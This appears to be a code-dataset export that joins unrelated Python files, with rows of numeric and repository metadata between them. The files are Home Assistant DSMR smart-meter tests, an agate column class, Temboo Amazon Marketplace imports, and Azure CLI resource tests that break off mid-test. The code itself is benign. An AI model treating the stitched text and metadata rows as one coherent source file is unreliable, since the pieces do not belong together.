    assert gas_consumption.attributes.get("unit_of_measurement") == VOLUME_CUBIC_METERS
    assert (
        gas_consumption.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_TOTAL_INCREASING
    )
    assert (
        gas_consumption.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == VOLUME_CUBIC_METERS
    )
async def test_v5_meter(hass, dsmr_connection_fixture):
    """Test if v5 meter is correctly parsed."""
    (connection_factory, transport, protocol) = dsmr_connection_fixture
    from dsmr_parser.obis_references import (
        ELECTRICITY_ACTIVE_TARIFF,
        HOURLY_GAS_METER_READING,
    )
    from dsmr_parser.objects import CosemObject, MBusObject
    entry_data = {
        "port": "/dev/ttyUSB0",
        "dsmr_version": "5",
        "precision": 4,
        "reconnect_interval": 30,
        "serial_id": "1234",
        "serial_id_gas": "5678",
    }
    entry_options = {
        # 0 so telegram updates propagate immediately (no throttling).
        "time_between_update": 0,
    }
    telegram = {
        HOURLY_GAS_METER_READING: MBusObject(
            [
                {"value": datetime.datetime.fromtimestamp(1551642213)},
                {"value": Decimal(745.695), "unit": "m3"},
            ]
        ),
        ELECTRICITY_ACTIVE_TARIFF: CosemObject([{"value": "0001", "unit": ""}]),
    }
    mock_entry = MockConfigEntry(
        domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data, options=entry_options
    )
    mock_entry.add_to_hass(hass)
    await hass.config_entries.async_setup(mock_entry.entry_id)
    await hass.async_block_till_done()
    # Third positional arg of the connection factory is the telegram callback.
    telegram_callback = connection_factory.call_args_list[0][0][2]
    # simulate a telegram pushed from the smartmeter and parsed by dsmr_parser
    telegram_callback(telegram)
    # after receiving telegram entities need to have the chance to update
    await asyncio.sleep(0)
    # tariff should be translated in human readable and have no unit
    power_tariff = hass.states.get("sensor.power_tariff")
    assert power_tariff.state == "low"
    assert power_tariff.attributes.get(ATTR_DEVICE_CLASS) is None
    assert power_tariff.attributes.get(ATTR_ICON) == "mdi:flash"
    assert power_tariff.attributes.get(ATTR_STATE_CLASS) is None
    assert power_tariff.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == ""
    # check if gas consumption is parsed correctly
    gas_consumption = hass.states.get("sensor.gas_consumption")
    assert gas_consumption.state == "745.695"
    assert gas_consumption.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_GAS
    assert (
        gas_consumption.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_TOTAL_INCREASING
    )
    assert (
        gas_consumption.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == VOLUME_CUBIC_METERS
    )
async def test_luxembourg_meter(hass, dsmr_connection_fixture):
    """Test if the Luxembourg ("5L") meter is correctly parsed.

    Luxembourg meters report global used/delivered tariffs instead of the
    per-tariff readings used by the Dutch protocol variants.
    """
    (connection_factory, transport, protocol) = dsmr_connection_fixture
    from dsmr_parser.obis_references import (
        HOURLY_GAS_METER_READING,
        LUXEMBOURG_ELECTRICITY_DELIVERED_TARIFF_GLOBAL,
        LUXEMBOURG_ELECTRICITY_USED_TARIFF_GLOBAL,
    )
    from dsmr_parser.objects import CosemObject, MBusObject
    entry_data = {
        "port": "/dev/ttyUSB0",
        "dsmr_version": "5L",
        "precision": 4,
        "reconnect_interval": 30,
        "serial_id": "1234",
        "serial_id_gas": "5678",
    }
    entry_options = {
        # 0 so telegram updates propagate immediately (no throttling).
        "time_between_update": 0,
    }
    telegram = {
        HOURLY_GAS_METER_READING: MBusObject(
            [
                {"value": datetime.datetime.fromtimestamp(1551642213)},
                {"value": Decimal(745.695), "unit": "m3"},
            ]
        ),
        LUXEMBOURG_ELECTRICITY_USED_TARIFF_GLOBAL: CosemObject(
            [{"value": Decimal(123.456), "unit": ENERGY_KILO_WATT_HOUR}]
        ),
        LUXEMBOURG_ELECTRICITY_DELIVERED_TARIFF_GLOBAL: CosemObject(
            [{"value": Decimal(654.321), "unit": ENERGY_KILO_WATT_HOUR}]
        ),
    }
    mock_entry = MockConfigEntry(
        domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data, options=entry_options
    )
    mock_entry.add_to_hass(hass)
    await hass.config_entries.async_setup(mock_entry.entry_id)
    await hass.async_block_till_done()
    # Third positional arg of the connection factory is the telegram callback.
    telegram_callback = connection_factory.call_args_list[0][0][2]
    # simulate a telegram pushed from the smartmeter and parsed by dsmr_parser
    telegram_callback(telegram)
    # after receiving telegram entities need to have the chance to update
    await asyncio.sleep(0)
    power_tariff = hass.states.get("sensor.energy_consumption_total")
    assert power_tariff.state == "123.456"
    assert power_tariff.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_ENERGY
    assert power_tariff.attributes.get(ATTR_ICON) is None
    assert power_tariff.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_TOTAL_INCREASING
    assert (
        power_tariff.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == ENERGY_KILO_WATT_HOUR
    )
    power_tariff = hass.states.get("sensor.energy_production_total")
    assert power_tariff.state == "654.321"
    assert power_tariff.attributes.get("unit_of_measurement") == ENERGY_KILO_WATT_HOUR
    # check if gas consumption is parsed correctly
    gas_consumption = hass.states.get("sensor.gas_consumption")
    assert gas_consumption.state == "745.695"
    assert gas_consumption.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_GAS
    assert (
        gas_consumption.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_TOTAL_INCREASING
    )
    assert (
        gas_consumption.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == VOLUME_CUBIC_METERS
    )
async def test_belgian_meter(hass, dsmr_connection_fixture):
    """Test if Belgian ("5B") meter is correctly parsed.

    Belgian meters use BELGIUM_HOURLY_GAS_METER_READING, and tariff "0001"
    maps to "normal" (the Dutch variants map it to "low").
    """
    (connection_factory, transport, protocol) = dsmr_connection_fixture
    from dsmr_parser.obis_references import (
        BELGIUM_HOURLY_GAS_METER_READING,
        ELECTRICITY_ACTIVE_TARIFF,
    )
    from dsmr_parser.objects import CosemObject, MBusObject
    entry_data = {
        "port": "/dev/ttyUSB0",
        "dsmr_version": "5B",
        "precision": 4,
        "reconnect_interval": 30,
        "serial_id": "1234",
        "serial_id_gas": "5678",
    }
    entry_options = {
        # 0 so telegram updates propagate immediately (no throttling).
        "time_between_update": 0,
    }
    telegram = {
        BELGIUM_HOURLY_GAS_METER_READING: MBusObject(
            [
                {"value": datetime.datetime.fromtimestamp(1551642213)},
                {"value": Decimal(745.695), "unit": "m3"},
            ]
        ),
        ELECTRICITY_ACTIVE_TARIFF: CosemObject([{"value": "0001", "unit": ""}]),
    }
    mock_entry = MockConfigEntry(
        domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data, options=entry_options
    )
    mock_entry.add_to_hass(hass)
    await hass.config_entries.async_setup(mock_entry.entry_id)
    await hass.async_block_till_done()
    # Third positional arg of the connection factory is the telegram callback.
    telegram_callback = connection_factory.call_args_list[0][0][2]
    # simulate a telegram pushed from the smartmeter and parsed by dsmr_parser
    telegram_callback(telegram)
    # after receiving telegram entities need to have the chance to update
    await asyncio.sleep(0)
    # tariff should be translated in human readable and have no unit
    power_tariff = hass.states.get("sensor.power_tariff")
    assert power_tariff.state == "normal"
    assert power_tariff.attributes.get(ATTR_DEVICE_CLASS) is None
    assert power_tariff.attributes.get(ATTR_ICON) == "mdi:flash"
    assert power_tariff.attributes.get(ATTR_STATE_CLASS) is None
    assert power_tariff.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == ""
    # check if gas consumption is parsed correctly
    # BUG FIX: was `is DEVICE_CLASS_GAS` — identity comparison against a string
    # constant only passes by interning accident; compare by equality.
    gas_consumption = hass.states.get("sensor.gas_consumption")
    assert gas_consumption.state == "745.695"
    assert gas_consumption.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_GAS
    assert (
        gas_consumption.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_TOTAL_INCREASING
    )
    assert (
        gas_consumption.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == VOLUME_CUBIC_METERS
    )
async def test_belgian_meter_low(hass, dsmr_connection_fixture):
    """Test if Belgian meter tariff "0002" is parsed as the low tariff."""
    (connection_factory, transport, protocol) = dsmr_connection_fixture
    from dsmr_parser.obis_references import ELECTRICITY_ACTIVE_TARIFF
    from dsmr_parser.objects import CosemObject
    entry_data = {
        "port": "/dev/ttyUSB0",
        "dsmr_version": "5B",
        "precision": 4,
        "reconnect_interval": 30,
        "serial_id": "1234",
        "serial_id_gas": "5678",
    }
    entry_options = {
        # 0 so telegram updates propagate immediately (no throttling).
        "time_between_update": 0,
    }
    telegram = {ELECTRICITY_ACTIVE_TARIFF: CosemObject([{"value": "0002", "unit": ""}])}
    mock_entry = MockConfigEntry(
        domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data, options=entry_options
    )
    mock_entry.add_to_hass(hass)
    await hass.config_entries.async_setup(mock_entry.entry_id)
    await hass.async_block_till_done()
    # Third positional arg of the connection factory is the telegram callback.
    telegram_callback = connection_factory.call_args_list[0][0][2]
    # simulate a telegram pushed from the smartmeter and parsed by dsmr_parser
    telegram_callback(telegram)
    # after receiving telegram entities need to have the chance to update
    await asyncio.sleep(0)
    # tariff should be translated in human readable and have no unit
    power_tariff = hass.states.get("sensor.power_tariff")
    assert power_tariff.state == "low"
    assert power_tariff.attributes.get(ATTR_DEVICE_CLASS) is None
    assert power_tariff.attributes.get(ATTR_ICON) == "mdi:flash"
    assert power_tariff.attributes.get(ATTR_STATE_CLASS) is None
    assert power_tariff.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == ""
async def test_swedish_meter(hass, dsmr_connection_fixture):
    """Test if the Swedish ("5S") meter is correctly parsed.

    Swedish meters report global used/delivered tariffs and have no
    serial ids (both configured as None).
    """
    (connection_factory, transport, protocol) = dsmr_connection_fixture
    from dsmr_parser.obis_references import (
        SWEDEN_ELECTRICITY_DELIVERED_TARIFF_GLOBAL,
        SWEDEN_ELECTRICITY_USED_TARIFF_GLOBAL,
    )
    from dsmr_parser.objects import CosemObject
    entry_data = {
        "port": "/dev/ttyUSB0",
        "dsmr_version": "5S",
        "precision": 4,
        "reconnect_interval": 30,
        "serial_id": None,
        "serial_id_gas": None,
    }
    entry_options = {
        # 0 so telegram updates propagate immediately (no throttling).
        "time_between_update": 0,
    }
    telegram = {
        SWEDEN_ELECTRICITY_USED_TARIFF_GLOBAL: CosemObject(
            [{"value": Decimal(123.456), "unit": ENERGY_KILO_WATT_HOUR}]
        ),
        SWEDEN_ELECTRICITY_DELIVERED_TARIFF_GLOBAL: CosemObject(
            [{"value": Decimal(654.321), "unit": ENERGY_KILO_WATT_HOUR}]
        ),
    }
    mock_entry = MockConfigEntry(
        domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data, options=entry_options
    )
    mock_entry.add_to_hass(hass)
    await hass.config_entries.async_setup(mock_entry.entry_id)
    await hass.async_block_till_done()
    # Third positional arg of the connection factory is the telegram callback.
    telegram_callback = connection_factory.call_args_list[0][0][2]
    # simulate a telegram pushed from the smartmeter and parsed by dsmr_parser
    telegram_callback(telegram)
    # after receiving telegram entities need to have the chance to update
    await asyncio.sleep(0)
    power_tariff = hass.states.get("sensor.energy_consumption_total")
    assert power_tariff.state == "123.456"
    assert power_tariff.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_ENERGY
    assert power_tariff.attributes.get(ATTR_ICON) is None
    assert power_tariff.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_TOTAL_INCREASING
    assert (
        power_tariff.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == ENERGY_KILO_WATT_HOUR
    )
    power_tariff = hass.states.get("sensor.energy_production_total")
    assert power_tariff.state == "654.321"
    assert power_tariff.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_TOTAL_INCREASING
    assert (
        power_tariff.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == ENERGY_KILO_WATT_HOUR
    )
async def test_tcp(hass, dsmr_connection_fixture):
    """If proper config provided TCP connection should be made.

    When a "host" key is present the integration must connect over TCP,
    passing host and port as the first two factory arguments.
    """
    (connection_factory, transport, protocol) = dsmr_connection_fixture
    entry_data = {
        "host": "localhost",
        "port": "1234",
        "dsmr_version": "2.2",
        "precision": 4,
        "reconnect_interval": 30,
        "serial_id": "1234",
        "serial_id_gas": "5678",
    }
    mock_entry = MockConfigEntry(
        domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data
    )
    mock_entry.add_to_hass(hass)
    await hass.config_entries.async_setup(mock_entry.entry_id)
    await hass.async_block_till_done()
    # Factory must have been invoked with (host, port, ...) positionally.
    assert connection_factory.call_args_list[0][0][0] == "localhost"
    assert connection_factory.call_args_list[0][0][1] == "1234"
async def test_connection_errors_retry(hass, dsmr_connection_fixture):
    """Connection should be retried on error during setup."""
    (connection_factory, transport, protocol) = dsmr_connection_fixture
    entry_data = {
        "port": "/dev/ttyUSB0",
        "dsmr_version": "2.2",
        "precision": 4,
        # immediate retry so the test does not have to wait
        "reconnect_interval": 0,
        "serial_id": "1234",
        "serial_id_gas": "5678",
    }
    # override the mock to have it fail the first time and succeed after
    # (chain raises TimeoutError once, then DEFAULT restores normal behavior)
    first_fail_connection_factory = MagicMock(
        return_value=(transport, protocol),
        side_effect=chain([TimeoutError], repeat(DEFAULT)),
    )
    mock_entry = MockConfigEntry(
        domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data
    )
    mock_entry.add_to_hass(hass)
    with patch(
        "homeassistant.components.dsmr.sensor.create_dsmr_reader",
        first_fail_connection_factory,
    ):
        await hass.config_entries.async_setup(mock_entry.entry_id)
        await hass.async_block_till_done()
        # wait for sleep to resolve
        await hass.async_block_till_done()
        assert first_fail_connection_factory.call_count >= 2, "connecting not retried"
async def test_reconnect(hass, dsmr_connection_fixture):
    """If transport disconnects, the connection should be retried."""
    (connection_factory, transport, protocol) = dsmr_connection_fixture
    entry_data = {
        "port": "/dev/ttyUSB0",
        "dsmr_version": "2.2",
        "precision": 4,
        # immediate reconnect so the test does not have to wait
        "reconnect_interval": 0,
        "serial_id": "1234",
        "serial_id_gas": "5678",
    }
    # mock waiting coroutine while connection lasts
    closed = asyncio.Event()
    # Handshake so that `hass.async_block_till_done()` doesn't cycle forever
    closed2 = asyncio.Event()
    async def wait_closed():
        # blocks until the test signals a "disconnect" via `closed`
        await closed.wait()
        closed2.set()
    protocol.wait_closed = wait_closed
    mock_entry = MockConfigEntry(
        domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data
    )
    mock_entry.add_to_hass(hass)
    await hass.config_entries.async_setup(mock_entry.entry_id)
    await hass.async_block_till_done()
    assert connection_factory.call_count == 1
    # indicate disconnect, release wait lock and allow reconnect to happen
    closed.set()
    # wait for lock set to resolve
    await closed2.wait()
    closed2.clear()
    closed.clear()
    await hass.async_block_till_done()
    assert connection_factory.call_count >= 2, "connecting not retried"
    # setting it so teardown can be successful
    closed.set()
    await hass.config_entries.async_unload(mock_entry.entry_id)
    assert mock_entry.state == config_entries.ConfigEntryState.NOT_LOADED
| 33.431154
| 88
| 0.697009
| 2,927
| 24,037
| 5.419884
| 0.085412
| 0.037443
| 0.052509
| 0.052761
| 0.844239
| 0.811649
| 0.805913
| 0.785741
| 0.763805
| 0.753089
| 0
| 0.022053
| 0.205808
| 24,037
| 718
| 89
| 33.477716
| 0.808958
| 0.089653
| 0
| 0.651252
| 0
| 0
| 0.116468
| 0.027462
| 0
| 0
| 0
| 0
| 0.165703
| 1
| 0
| false
| 0
| 0.050096
| 0
| 0.050096
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0a9e97f68d27097c8bb028edc29a204ca3af1fef
| 158
|
py
|
Python
|
agate/columns/text.py
|
captainsafia/agate
|
14f41d13f72160a374d2504d9c9ade958f543eab
|
[
"MIT"
] | null | null | null |
agate/columns/text.py
|
captainsafia/agate
|
14f41d13f72160a374d2504d9c9ade958f543eab
|
[
"MIT"
] | null | null | null |
agate/columns/text.py
|
captainsafia/agate
|
14f41d13f72160a374d2504d9c9ade958f543eab
|
[
"MIT"
] | 1
|
2019-11-26T03:25:18.000Z
|
2019-11-26T03:25:18.000Z
|
#!/usr/bin/env python
from agate.columns.base import Column
class TextColumn(Column):
    """A column whose values are unicode/string data."""
| 15.8
| 44
| 0.670886
| 20
| 158
| 5.3
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.21519
| 158
| 9
| 45
| 17.555556
| 0.854839
| 0.386076
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
0aafa910e9e00a30e0b3db0561291bb43125fb39
| 1,089
|
py
|
Python
|
temboo/core/Library/Amazon/Marketplace/Orders/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Amazon/Marketplace/Orders/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Amazon/Marketplace/Orders/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.Amazon.Marketplace.Orders.GetOrder import GetOrder, GetOrderInputSet, GetOrderResultSet, GetOrderChoreographyExecution
from temboo.Library.Amazon.Marketplace.Orders.GetServiceStatus import GetServiceStatus, GetServiceStatusInputSet, GetServiceStatusResultSet, GetServiceStatusChoreographyExecution
from temboo.Library.Amazon.Marketplace.Orders.ListOrderItems import ListOrderItems, ListOrderItemsInputSet, ListOrderItemsResultSet, ListOrderItemsChoreographyExecution
from temboo.Library.Amazon.Marketplace.Orders.ListOrders import ListOrders, ListOrdersInputSet, ListOrdersResultSet, ListOrdersChoreographyExecution
from temboo.Library.Amazon.Marketplace.Orders.ListOrdersWithBuyerEmail import ListOrdersWithBuyerEmail, ListOrdersWithBuyerEmailInputSet, ListOrdersWithBuyerEmailResultSet, ListOrdersWithBuyerEmailChoreographyExecution
from temboo.Library.Amazon.Marketplace.Orders.ListOrdersWithSellerOrderId import ListOrdersWithSellerOrderId, ListOrdersWithSellerOrderIdInputSet, ListOrdersWithSellerOrderIdResultSet, ListOrdersWithSellerOrderIdChoreographyExecution
| 155.571429
| 233
| 0.917355
| 72
| 1,089
| 13.875
| 0.430556
| 0.06006
| 0.102102
| 0.138138
| 0.24024
| 0.24024
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038567
| 1,089
| 6
| 234
| 181.5
| 0.954155
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0ac8419e84f39e10b61869d327cebfa6015d19df
| 172,049
|
py
|
Python
|
src/azure-cli/azure/cli/command_modules/resource/tests/latest/test_resource.py
|
sudokylumaster/azure-cli
|
5bbb75e4860dcd086ca8b4c413a64acb9a6dbb2f
|
[
"MIT"
] | 1
|
2021-02-19T02:54:09.000Z
|
2021-02-19T02:54:09.000Z
|
src/azure-cli/azure/cli/command_modules/resource/tests/latest/test_resource.py
|
sudokylumaster/azure-cli
|
5bbb75e4860dcd086ca8b4c413a64acb9a6dbb2f
|
[
"MIT"
] | null | null | null |
src/azure-cli/azure/cli/command_modules/resource/tests/latest/test_resource.py
|
sudokylumaster/azure-cli
|
5bbb75e4860dcd086ca8b4c413a64acb9a6dbb2f
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import json
import os
import shutil
import time
import mock
import unittest
from azure.cli.core.parser import IncorrectUsageError
from azure_devtools.scenario_tests.const import MOCKED_SUBSCRIPTION_ID
from azure_devtools.scenario_tests import AllowLargeResponse
from azure.cli.testsdk import (ScenarioTest, LocalContextScenarioTest, LiveScenarioTest, ResourceGroupPreparer, StorageAccountPreparer,
create_random_name, live_only, record_only)
from azure.cli.core.util import get_file_json
from knack.util import CLIError
class ResourceGroupScenarioTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_rg_scenario')
def test_resource_group(self, resource_group):
    """Exercise the resource-group CRUD lifecycle: delete, create with
    tags and managed-by, exists/show/list checks, tag updates (including
    --force-string handling), and ARM template export."""
    # Remove the prepared group, verify it is gone, then recreate it.
    self.cmd('group delete -n {rg} --yes')
    self.cmd('group exists -n {rg}',
             checks=self.check('@', False))
    self.cmd('group create -n {rg} -l westus --tag a=b c --managed-by test_admin', checks=[
        self.check('name', '{rg}'),
        self.check('tags', {'a': 'b', 'c': ''}),
        self.check('managedBy', 'test_admin')
    ])
    self.cmd('group exists -n {rg}',
             checks=self.check('@', True))
    self.cmd('group show -n {rg}', checks=[
        self.check('name', '{rg}'),
        self.check('tags', {'a': 'b', 'c': ''})
    ])
    self.cmd('group list --tag a=b', checks=[
        self.check('[0].name', '{rg}'),
        self.check('[0].tags', {'a': 'b', 'c': ''})
    ])
    # test --force-string
    # escaped JSON: without --force-string it is parsed as a dict,
    # with --force-string it is kept as the literal string value
    self.kwargs.update({'tag': "\"{\\\"k\\\":\\\"v\\\"}\""})
    self.cmd('group update -g {rg} --tags ""',
             checks=self.check('tags', {}))
    self.cmd('group update -g {rg} --set tags.a={tag}',
             checks=self.check('tags.a', "{{'k': 'v'}}"))
    self.cmd('group update -g {rg} --set tags.b={tag} --force-string',
             checks=self.check('tags.b', '{{\"k\":\"v\"}}'))
    result = self.cmd('group export --name {rg} --query "contentVersion"')
    self.assertEqual('"1.0.0.0"\n', result.output)
@ResourceGroupPreparer(name_prefix='cli_test_rg_scenario')
def test_resource_group_export_skip_all_params(self, resource_group):
self.kwargs.update({
'vnet': 'vnet1'
})
self.cmd('network vnet create -g {rg} -n {vnet}')
self.kwargs['vnet_id'] = self.cmd('network vnet show -g {rg} -n {vnet}').get_output_in_json()['id']
result = self.cmd('group export --name {rg} --resource-ids "{vnet_id}" --skip-all-params --query "parameters"')
self.assertEqual('{}\n', result.output)
@ResourceGroupPreparer(name_prefix='cli_test_rg_scenario')
def test_resource_group_export_skip_resource_name_params(self, resource_group):
self.kwargs.update({
'vnet': 'vnet1'
})
self.cmd('network vnet create -g {rg} -n {vnet}')
self.kwargs['vnet_id'] = self.cmd('network vnet show -g {rg} -n {vnet}').get_output_in_json()['id']
result = self.cmd('group export --name {rg} --resource-ids "{vnet_id}" --skip-resource-name-params --query "parameters"')
self.assertEqual('{}\n', result.output)
class ResourceGroupNoWaitScenarioTest(ScenarioTest):
    """Tests `az group delete --no-wait` together with `az group wait` polling."""

    @ResourceGroupPreparer(name_prefix='cli_rg_nowait_test')
    def test_resource_group_no_wait(self, resource_group):
        """Fire-and-forget delete, wait for deletion, recreate, then wait for existence."""
        # --no-wait returns immediately with no output.
        self.cmd('group delete -n {rg} --no-wait --yes',
                 checks=self.is_empty())
        # Block until the asynchronous delete actually completes.
        self.cmd('group wait --deleted -n {rg}',
                 checks=self.is_empty())
        self.cmd('group exists -n {rg}',
                 checks=self.check('@', False))
        self.cmd('group create -n {rg} -l westus --managed-by test_admin', checks=[
            self.check('name', '{rg}'),
            self.check('managedBy', 'test_admin')
        ])
        self.cmd('group exists -n {rg}',
                 checks=self.check('@', True))
        self.cmd('group wait --exists -n {rg}',
                 checks=self.is_empty())
class ResourceLinkScenarioTest(ScenarioTest):
    """Tests `az resource link` create/show/update/list/delete against a vnet target."""

    @ResourceGroupPreparer(name_prefix='cli_test_resource_link_scenario')
    def test_resource_link_scenario(self, resource_group):
        """Create a link from the resource group to a vnet, update its notes, then delete it."""
        self.kwargs.update({
            'vnet': 'vnet1'
        })
        self.cmd('network vnet create -g {rg} -n {vnet}')
        self.kwargs['vnet_id'] = self.cmd('network vnet show -g {rg} -n {vnet}').get_output_in_json()['id']
        rg_id = self.cmd('group show -g {rg}').get_output_in_json()['id']
        # Link IDs live under the source scope's Microsoft.Resources/links namespace.
        self.kwargs['link_id'] = '{}/providers/Microsoft.Resources/links/link1'.format(rg_id)
        self.cmd('resource link create --link {link_id} --target {vnet_id} --notes "blah notes"')
        self.cmd('resource link show --link {link_id}', checks=[
            self.check('name', 'link1'),
            self.check('properties.notes', 'blah notes')
        ])
        self.cmd('resource link update --link {link_id} --target {vnet_id} --notes "group to vnet"')
        # Capture the total link count before deletion so the final check is relative.
        num_link = int(self.cmd('resource link list --query length(@) -o tsv').output)
        self.cmd('resource link show --link {link_id}', checks=[
            self.check('name', 'link1'),
            self.check('properties.notes', 'group to vnet')
        ])
        self.cmd('resource link delete --link {link_id}')
        self.cmd('resource link list',
                 checks=self.check('length(@)', num_link - 1))
class ResourceScenarioTest(ScenarioTest):
    """Tests the generic `az resource` commands (list/show/tag/delete) using a vnet."""

    @ResourceGroupPreparer(name_prefix='cli_test_resource_scenario', location='southcentralus')
    @AllowLargeResponse()
    def test_resource_scenario(self, resource_group, resource_group_location):
        """List resources by name/location/type/tag, show a parent and a child
        resource, clear tags, then delete and verify removal."""
        self.kwargs.update({
            'loc': resource_group_location,
            'vnet': self.create_random_name('vnet-', 30),
            'subnet': self.create_random_name('subnet-', 30),
            'rt': 'Microsoft.Network/virtualNetworks'
        })
        # Baseline count of same-named vnets across the subscription (normally 0).
        vnet_count = self.cmd("resource list --query \"length([?name=='{vnet}'])\"").get_output_in_json() or 0
        self.cmd('network vnet create -g {rg} -n {vnet} --subnet-name {subnet} --tags cli-test=test')
        vnet_count += 1
        self.cmd('resource list',
                 checks=self.check("length([?name=='{vnet}'])", vnet_count))
        self.cmd('resource list -l {loc}',
                 checks=self.check("length([?location == '{loc}']) == length(@)", True))
        self.cmd('resource list --resource-type {rt}',
                 checks=self.check("length([?name=='{vnet}'])", vnet_count))
        self.cmd('resource list --name {vnet}', checks=[
            self.check("length([?name=='{vnet}'])", vnet_count),
            self.check('[0].provisioningState', 'Succeeded')
        ])
        self.cmd('resource list --tag cli-test',
                 checks=self.check("length([?name=='{vnet}'])", vnet_count))
        self.cmd('resource list --tag cli-test=test',
                 checks=self.check("length([?name=='{vnet}'])", vnet_count))
        # check for simple resource with tag
        self.cmd('resource show -n {vnet} -g {rg} --resource-type Microsoft.Network/virtualNetworks', checks=[
            self.check('name', '{vnet}'),
            self.check('location', '{loc}'),
            self.check('resourceGroup', '{rg}'),
            self.check('tags', {'cli-test': 'test'})
        ])
        # check for child resource (subnet addressed via --namespace/--parent)
        self.cmd('resource show -n {subnet} -g {rg} --namespace Microsoft.Network --parent virtualNetworks/{vnet} --resource-type subnets', checks=[
            self.check('name', '{subnet}'),
            self.check('resourceGroup', '{rg}')
        ])
        # clear tag and verify
        self.cmd('resource tag -n {vnet} -g {rg} --resource-type Microsoft.Network/virtualNetworks --tags')
        self.cmd('resource show -n {vnet} -g {rg} --resource-type Microsoft.Network/virtualNetworks',
                 checks=self.check('tags', {}))
        # delete and verify; brief sleep lets the deletion propagate before listing again
        self.cmd('resource delete -n {vnet} -g {rg} --resource-type {rt}')
        time.sleep(10)
        self.cmd('resource list', checks=self.check("length([?name=='{vnet}'])", 0))
class ResourceIDScenarioTest(ScenarioTest):
    """Tests `az resource` operations addressed purely by ARM resource ID (--id)."""

    @ResourceGroupPreparer(name_prefix='cli_test_resource_id')
    def test_resource_id_scenario(self, resource_group):
        """Tag/show/update/delete a vnet and its subnet via fully-qualified resource IDs."""
        self.kwargs.update({
            'vnet': 'cli_test_resource_id_vnet',
            'subnet': 'cli_test_resource_id_subnet'
        })
        self.cmd('network vnet create -g {rg} -n {vnet} --subnet-name {subnet}')
        self.kwargs['sub'] = self.get_subscription_id()
        # Build the ARM IDs by hand to exercise the --id code path end to end.
        self.kwargs['vnet_id'] = '/subscriptions/{sub}/resourceGroups/{rg}/providers/Microsoft.Network/virtualNetworks/{vnet}'.format(
            **self.kwargs)
        self.cmd('resource tag --id {vnet_id} --tags tag-vnet')
        self.cmd('resource show --id {vnet_id}', checks=[
            self.check('name', '{vnet}'),
            self.check('resourceGroup', '{rg}'),
            self.check('tags', {'tag-vnet': ''})
        ])
        self.kwargs['subnet_id'] = '/subscriptions/{sub}/resourceGroups/{rg}/providers/Microsoft.Network/virtualNetworks/{vnet}/subnets/{subnet}'.format(
            **self.kwargs)
        self.cmd('resource show --id {subnet_id}', checks=[
            self.check('name', '{subnet}'),
            self.check('resourceGroup', '{rg}'),
            self.check('properties.addressPrefix', '10.0.0.0/24')
        ])
        # Generic --set update of a nested property on the child resource.
